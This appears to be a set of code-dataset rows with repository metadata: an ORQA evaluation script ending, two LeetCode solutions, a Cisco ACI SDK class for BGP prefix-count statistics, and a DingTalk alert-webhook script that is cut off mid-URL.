correct_count += int(is_correct)
example_count += 1
tf.logging.info("Accuracy: %.4f (%d/%d)",
correct_count/float(example_count),
correct_count,
example_count)
if __name__ == "__main__":
tf.disable_v2_behavior()
tf.app.run()
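# Illustrative invocation (not part of the original file; both paths are
# hypothetical):
#   python -m language.orqa.predict.orqa_eval \
#       --model_dir=/tmp/orqa_model --dataset_path=/tmp/nq_dev.jsonl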
| [
"[email protected]"
] | |
81dbc6da5a67a3c9d1cf4e3e4013b93416329c60 | aef08a7c30c80d24a1ba5708f316153541b841d9 | /Leetcode 0071. Simplify Path.py | 7f9fbb46989a724cd62a68c8396c195fbacddb48 | [] | no_license | Chaoran-sjsu/leetcode | 65b8f9ba44c074f415a25989be13ad94505d925f | 6ff1941ff213a843013100ac7033e2d4f90fbd6a | refs/heads/master | 2023-03-19T02:43:29.022300 | 2020-11-03T02:33:25 | 2020-11-03T02:33:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,539 | py | """
71. Simplify Path
Given an absolute path for a file (Unix-style), simplify it. Or in other words, convert it to the canonical path.
In a UNIX-style file system, a period . refers to the current directory. Furthermore, a double period .. moves the directory up a level.
Note that the returned canonical path must always begin with a slash /, and there must be only a single slash / between two directory names. The last directory name (if it exists) must not end with a trailing /. Also, the canonical path must be the shortest string representing the absolute path.
Example 1:
Input: "/home/"
Output: "/home"
Explanation: Note that there is no trailing slash after the last directory name.
Example 2:
Input: "/../"
Output: "/"
Explanation: Going one level up from the root directory is a no-op, as the root level is the highest level you can go.
Example 3:
Input: "/home//foo/"
Output: "/home/foo"
Explanation: In the canonical path, multiple consecutive slashes are replaced by a single one.
Example 4:
Input: "/a/./b/../../c/"
Output: "/c"
Example 5:
Input: "/a/../../b/../c//.//"
Output: "/c"
Example 6:
Input: "/a//b////c/d//././/.."
Output: "/a/b/c"
"""
class Solution:
def simplifyPath(self, path: str) -> str:
stack = []
for s in path.split("/"):
if len(s) == 0 or s == ".":
continue
elif s == "..":
if len(stack) > 0:
stack.pop()
else:
stack.append(s)
return "/" + "/".join(stack)
| [
"[email protected]"
] | |
631e33fe35bf9b382cc076142b56410f9f925c6f | e60a342f322273d3db5f4ab66f0e1ffffe39de29 | /parts/zodiac/pyramid/tests/pkgs/fixtureapp/views.py | a42b58217f01e42d42c80a658be0d1bc8c543933 | [] | no_license | Xoting/GAExotZodiac | 6b1b1f5356a4a4732da4c122db0f60b3f08ff6c1 | f60b2b77b47f6181752a98399f6724b1cb47ddaf | refs/heads/master | 2021-01-15T21:45:20.494358 | 2014-01-13T15:29:22 | 2014-01-13T15:29:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 89 | py | /home/alex/myenv/zodiac/eggs/pyramid-1.4-py2.7.egg/pyramid/tests/pkgs/fixtureapp/views.py | [
"[email protected]"
] | |
40d415f635b35add767833905aef591e6990c7bb | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/bgp/bgprtprefixcounthist1year.py | 71ca4307f2d3906eb50252edabe8f510d7043377 | [] | no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,082 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class BgpRtPrefixCountHist1year(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = StatsClassMeta("cobra.model.bgp.BgpRtPrefixCountHist1year", "BGP Route Prefix Count")
counter = CounterMeta("pfxSaved", CounterCategory.COUNTER, "routecount", "Prefixes Saved")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "pfxSavedCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "pfxSavedPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "pfxSavedMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "pfxSavedMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "pfxSavedAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "pfxSavedSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "pfxSavedThr"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "pfxSavedTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "pfxSavedRate"
meta._counters.append(counter)
counter = CounterMeta("pfxSent", CounterCategory.COUNTER, "routecount", "Prefixes Sent")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "pfxSentCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "pfxSentPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "pfxSentMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "pfxSentMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "pfxSentAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "pfxSentSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "pfxSentThr"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "pfxSentTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "pfxSentRate"
meta._counters.append(counter)
counter = CounterMeta("acceptedPaths", CounterCategory.COUNTER, "routecount", "Accepted Paths")
counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "acceptedPathsCum"
counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "acceptedPathsPer"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "acceptedPathsMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "acceptedPathsMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "acceptedPathsAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "acceptedPathsSpct"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "acceptedPathsThr"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "acceptedPathsTr"
counter._propRefs[PropCategory.IMPLICIT_RATE] = "acceptedPathsRate"
meta._counters.append(counter)
meta.moClassName = "bgpBgpRtPrefixCountHist1year"
meta.rnFormat = "HDbgpBgpRtPrefixCount1year-%(index)s"
meta.category = MoCategory.STATS_HISTORY
meta.label = "historical BGP Route Prefix Count stats in 1 year"
meta.writeAccessMask = 0x8008020040001
meta.readAccessMask = 0x8008020040001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.bgp.PeerEntryStats")
meta.superClasses.add("cobra.model.bgp.BgpRtPrefixCountHist")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Hist")
meta.rnPrefixes = [
('HDbgpBgpRtPrefixCount1year-', True),
]
prop = PropMeta("str", "acceptedPathsAvg", "acceptedPathsAvg", 53822, PropCategory.IMPLICIT_AVG)
prop.label = "Accepted Paths average value"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsAvg", prop)
prop = PropMeta("str", "acceptedPathsCum", "acceptedPathsCum", 53818, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Accepted Paths cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsCum", prop)
prop = PropMeta("str", "acceptedPathsMax", "acceptedPathsMax", 53821, PropCategory.IMPLICIT_MAX)
prop.label = "Accepted Paths maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsMax", prop)
prop = PropMeta("str", "acceptedPathsMin", "acceptedPathsMin", 53820, PropCategory.IMPLICIT_MIN)
prop.label = "Accepted Paths minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsMin", prop)
prop = PropMeta("str", "acceptedPathsPer", "acceptedPathsPer", 53819, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Accepted Paths periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsPer", prop)
prop = PropMeta("str", "acceptedPathsRate", "acceptedPathsRate", 53826, PropCategory.IMPLICIT_RATE)
prop.label = "Accepted Paths rate"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsRate", prop)
prop = PropMeta("str", "acceptedPathsSpct", "acceptedPathsSpct", 53823, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Accepted Paths suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsSpct", prop)
prop = PropMeta("str", "acceptedPathsThr", "acceptedPathsThr", 53824, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Accepted Paths thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("acceptedPathsThr", prop)
prop = PropMeta("str", "acceptedPathsTr", "acceptedPathsTr", 53825, PropCategory.IMPLICIT_TREND)
prop.label = "Accepted Paths trend"
prop.isOper = True
prop.isStats = True
meta.props.add("acceptedPathsTr", prop)
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "index", "index", 53426, PropCategory.REGULAR)
prop.label = "History Index"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
meta.props.add("index", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "pfxSavedAvg", "pfxSavedAvg", 53843, PropCategory.IMPLICIT_AVG)
prop.label = "Prefixes Saved average value"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedAvg", prop)
prop = PropMeta("str", "pfxSavedCum", "pfxSavedCum", 53839, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Prefixes Saved cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedCum", prop)
prop = PropMeta("str", "pfxSavedMax", "pfxSavedMax", 53842, PropCategory.IMPLICIT_MAX)
prop.label = "Prefixes Saved maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedMax", prop)
prop = PropMeta("str", "pfxSavedMin", "pfxSavedMin", 53841, PropCategory.IMPLICIT_MIN)
prop.label = "Prefixes Saved minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedMin", prop)
prop = PropMeta("str", "pfxSavedPer", "pfxSavedPer", 53840, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Prefixes Saved periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedPer", prop)
prop = PropMeta("str", "pfxSavedRate", "pfxSavedRate", 53847, PropCategory.IMPLICIT_RATE)
prop.label = "Prefixes Saved rate"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedRate", prop)
prop = PropMeta("str", "pfxSavedSpct", "pfxSavedSpct", 53844, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Prefixes Saved suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedSpct", prop)
prop = PropMeta("str", "pfxSavedThr", "pfxSavedThr", 53845, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Prefixes Saved thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("pfxSavedThr", prop)
prop = PropMeta("str", "pfxSavedTr", "pfxSavedTr", 53846, PropCategory.IMPLICIT_TREND)
prop.label = "Prefixes Saved trend"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSavedTr", prop)
prop = PropMeta("str", "pfxSentAvg", "pfxSentAvg", 53864, PropCategory.IMPLICIT_AVG)
prop.label = "Prefixes Sent average value"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentAvg", prop)
prop = PropMeta("str", "pfxSentCum", "pfxSentCum", 53860, PropCategory.IMPLICIT_CUMULATIVE)
prop.label = "Prefixes Sent cumulative"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentCum", prop)
prop = PropMeta("str", "pfxSentMax", "pfxSentMax", 53863, PropCategory.IMPLICIT_MAX)
prop.label = "Prefixes Sent maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentMax", prop)
prop = PropMeta("str", "pfxSentMin", "pfxSentMin", 53862, PropCategory.IMPLICIT_MIN)
prop.label = "Prefixes Sent minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentMin", prop)
prop = PropMeta("str", "pfxSentPer", "pfxSentPer", 53861, PropCategory.IMPLICIT_PERIODIC)
prop.label = "Prefixes Sent periodic"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentPer", prop)
prop = PropMeta("str", "pfxSentRate", "pfxSentRate", 53868, PropCategory.IMPLICIT_RATE)
prop.label = "Prefixes Sent rate"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentRate", prop)
prop = PropMeta("str", "pfxSentSpct", "pfxSentSpct", 53865, PropCategory.IMPLICIT_SUSPECT)
prop.label = "Prefixes Sent suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentSpct", prop)
prop = PropMeta("str", "pfxSentThr", "pfxSentThr", 53866, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "Prefixes Sent thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("pfxSentThr", prop)
prop = PropMeta("str", "pfxSentTr", "pfxSentTr", 53867, PropCategory.IMPLICIT_TREND)
prop.label = "Prefixes Sent trend"
prop.isOper = True
prop.isStats = True
meta.props.add("pfxSentTr", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
meta.namingProps.append(getattr(meta.props, "index"))
def __init__(self, parentMoOrDn, index, markDirty=True, **creationProps):
namingVals = [index]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
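# Example (sketch, not part of the generated SDK): the *Thr properties above
# are bitmasks built from the constants registered via _addConstant, so a
# reading can be tested with a bitwise AND, e.g.
#   if int(mo.pfxSavedThr) & 2:     # lastreading-crossed-high-threshold
#       handle_threshold_cross(mo)  # hypothetical handler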
# End of package file
# ##################################################
| [
"[email protected]"
] | |
f46600e041a9e3fa1eb90c0961f25917ad284329 | e95fc8c562c050f47ecb6fb2639ce3024271a06d | /medium/46.全排列.py | 60bd223afd3aaf74a76e0693f8cd590cbe521c1d | [] | no_license | w940853815/my_leetcode | 3fb56745b95fbcb4086465ff42ea377c1d9fc764 | 6d39fa76c0def4f1d57840c40ffb360678caa96e | refs/heads/master | 2023-05-25T03:39:32.304242 | 2023-05-22T01:46:43 | 2023-05-22T01:46:43 | 179,017,338 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,032 | py | #
# @lc app=leetcode.cn id=46 lang=python3
#
# [46] Permutations (全排列)
#
# @lc code=start
from typing import List
"""
result = []
def backtrack(path, choices):
    if the end condition is met:
        result.add(path)
        return
    for choice in choices:
        make the choice
        backtrack(path, choices)
        undo the choice
"""
class Solution:
def permute(self, nums: List[int]) -> List[List[int]]:
res = []
track = []
def backtrack(track, nums):
if len(track) == len(nums):
                # copy the current permutation (list(track) makes a shallow copy)
tmp = list(track)
res.append(tmp)
return
for i in range(len(nums)):
if nums[i] in track:
continue
track.append(nums[i])
backtrack(track, nums)
track.pop()
backtrack(track, nums)
return res
if __name__ == "__main__":
s = Solution()
res = s.permute([1, 2, 3])
print(res)
# @lc code=end
| [
"[email protected]"
] | |
696b87b0bff7a5bcf494441ef9ff10dbad893cd4 | 8fd07ea363ba4263bafe25d213c72cc9a93e2b3e | /devops/Day4_json_requests_zabbix-api/zabbix/dingtalk.py | 2112181a91ce4aaf534cba9d5b2bc2035ec13296 | [] | no_license | ml758392/python_tedu | 82e12ae014f0fc81230386fab07f901510fc8837 | 9f20798604db0ac8cd7b69d8c7a52ee361ebc7a7 | refs/heads/master | 2020-04-12T08:30:42.354663 | 2019-03-29T11:55:30 | 2019-03-29T11:55:30 | 162,386,878 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 821 | py | # -*-coding:utf-8-*-
import json
import requests
import sys
def send_msg(url, reminders, msg):
headers = {'Content-Type': 'application/json;charset=utf-8'}
data = {
"msgtype": "text", # 发送消息类型为文本
"at": {
"atMobiles": reminders,
"isAtAll": False, # 不@所有人
},
"text": {
"content": msg, # 消息正文
}
}
r = requests.post(url, data=json.dumps(data), headers=headers)
return r.text
if __name__ == '__main__':
msg = sys.argv[1]
    reminders = ['15937762237']  # the people to specifically @-mention
    url = ('https://oapi.dingtalk.com/robot/send?access_token='
